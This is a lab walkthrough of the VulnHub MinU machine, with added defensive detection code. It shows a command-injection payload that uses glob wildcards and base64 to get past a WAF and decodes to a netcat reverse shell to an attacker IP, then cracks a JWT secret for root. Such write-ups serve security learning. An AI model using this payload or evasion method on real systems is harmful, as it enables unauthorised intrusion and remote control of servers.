MinU is an Ubuntu-based virtual machine released on VulnHub, designed to test your knowledge of how to evade a WAF in front of Apache. I personally think this was quite a challenge for me, and I'm not going to lie to you: I referenced some methods from a couple of blog posts on how to solve this machine, but it was still quite a fun ride.
Let's get started.
I like to begin working on a machine by scanning all ports with nmap using a high-intensity scan; since the machine is installed locally, it will not cost you significant time.
As you can see from the result, only port 80 (the web server) is open, and if you open the site it just shows a default web page. So I started enumerating the website with dirsearch and found a "test.php" page,
but what is really interesting is its parameter, which looks like this:
http://<ip address>/test.php?file=<filename>
It seems the parameter expects a file name as input, so I started with a directory traversal string: ../../../../../../etc/passwd
Unfortunately, every directory traversal attempt ended with a Forbidden banner; it seems the application is protected by a WAF.
So I continued testing with wfuzz. It is a tool designed for brute-forcing web applications: it can be used for finding unlinked resources (directories, servlets, scripts, etc.) and for brute-forcing GET and POST parameters to check for different kinds of injection.
It is going to give you a lot of results; I suggest adding "--hc 403" to hide 403 responses so the output is much clearer to read.
Let's focus on the results with a "C=200" code, since those are the payloads accepted by the web application. As you can see, we can execute a Linux command in the web application by using "|id".
Sweet :) now we have our point of entry. But not so fast! As I mentioned, the application is equipped with a WAF, and every time I entered a malicious command, whether to dump a sensitive file or create a backdoor, it was blocked by the WAF.
How do we evade the WAF? Well, according to https://www.exploit-db.com/docs/43946 we can use the question mark "?" to evade the firewall. The question mark is a shell wildcard (glob) character: like "*" it is expanded by the shell against file names, except that it matches exactly one character, so a blocked keyword never appears literally in the request.
I learned how to create the right exploit from this blog: https://medium.com/@honze_net/vulnhub-minu-1-write-up-8032fdda5939 and came up with a Python script that automatically generates the payload for me.
OK, let me break down how to interpret this payload.
Basically it goes like this:
& /bi?/ech? bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMTAyLiA4ODg4 | /u?r/b?n/b?s?64 -d | /b?n/sh
1. "&" terminates the previous command so that a new command can follow it.
2. /bi?/ech? is just /bin/echo, but we use wildcard characters to evade the WAF.
3. bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMTAyLiA4ODg4 is the base64 encoding of nc -e /bin/bash 192.168.56.102. 8888; we need to encode the payload to evade the WAF.
The first three parts on their own would just print the base64 value to the web page.
4. | /u?r/b?n/b?s?64 -d decodes the base64 back to the real command.
5. | /b?n/sh is just /bin/sh: the decoded command is piped into /bin/sh, which executes it and lets us create a backdoor.
If we put the payload into the parameter and execute it, we get a reverse shell :)
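As an added example (not from this write-up or the blogs it references), here is defender-side detection logic that inspects a request parameter for the two evasion tricks used above: glob metacharacters in absolute paths, which are expanded against a constructed list of sensitive paths, and base64 tokens that decode to readable text. The SENSITIVE_PATHS list and the 16-character base64 threshold are assumptions.

```python
import base64
import binascii
import fnmatch
import re

# Constructed allowlist of absolute paths a keyword-based WAF rule would block
# by name (assumption: typical Debian/Ubuntu locations). The detector checks
# whether a glob-obfuscated token still resolves to one of them.
SENSITIVE_PATHS = [
    "/bin/sh", "/bin/bash", "/bin/echo", "/bin/cat", "/usr/bin/id",
    "/usr/bin/base64", "/usr/bin/nc", "/etc/passwd", "/etc/shadow",
]
# Absolute-path token containing at least one shell glob metacharacter.
GLOB_TOKEN_RE = re.compile(r"/[\w./?*\[\]-]*[?*\[][\w./?*\[\]-]*")
# Base64 run long enough to carry a command (16 chars is a constructed threshold).
B64_TOKEN_RE = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
# The injected value from the write-up, used here as the sample input.
SAMPLE_PAYLOAD = ("& /bi?/ech? bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMTAyLiA4ODg4"
                  " | /u?r/b?n/b?s?64 -d | /b?n/sh")

def resolve_glob_tokens(value):
    """Map each glob-obfuscated path token in value to the sensitive paths it matches."""
    hits = {}
    for tok in GLOB_TOKEN_RE.findall(value):
        # fnmatchcase applies the same ?, * and [] rules the shell uses for file names
        matched = [p for p in SENSITIVE_PATHS if fnmatch.fnmatchcase(p, tok)]
        if matched:
            hits[tok] = matched
    return hits

def decode_b64_tokens(value):
    """Return the plaintext of base64-looking tokens that decode to printable ASCII."""
    decoded = []
    for tok in B64_TOKEN_RE.findall(value):
        try:
            raw = base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw and all(32 <= b < 127 for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded

def inspect_parameter(value):
    """Findings a WAF rule or log reviewer would want for one parameter value."""
    globs, texts = resolve_glob_tokens(value), decode_b64_tokens(value)
    return {"glob_paths": globs, "decoded_base64": texts,
            "suspicious": bool(globs) or bool(texts)}
```

Run against SAMPLE_PAYLOAD, the three wildcard tokens resolve to /bin/echo, /usr/bin/base64 and /bin/sh, and the base64 token decodes to the netcat command from step 3, which is what a plain keyword rule missed.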
We still have the lowest privileges, so it is time for privilege escalation. After a while enumerating the machine's contents, I stumbled on a hidden file called "._pw_".
It contains a JWT token, and we can crack its signing secret using c-jwt-cracker, a C-based tool for cracking JWT tokens: https://github.com/brendan-rius/c-jwt-cracker
Before you build the tool with "make", you need to install the "libssl-dev" library:
command: sudo apt install libssl-dev
We got the secret, yay! Now you can use this credential to log in to the machine as the root account.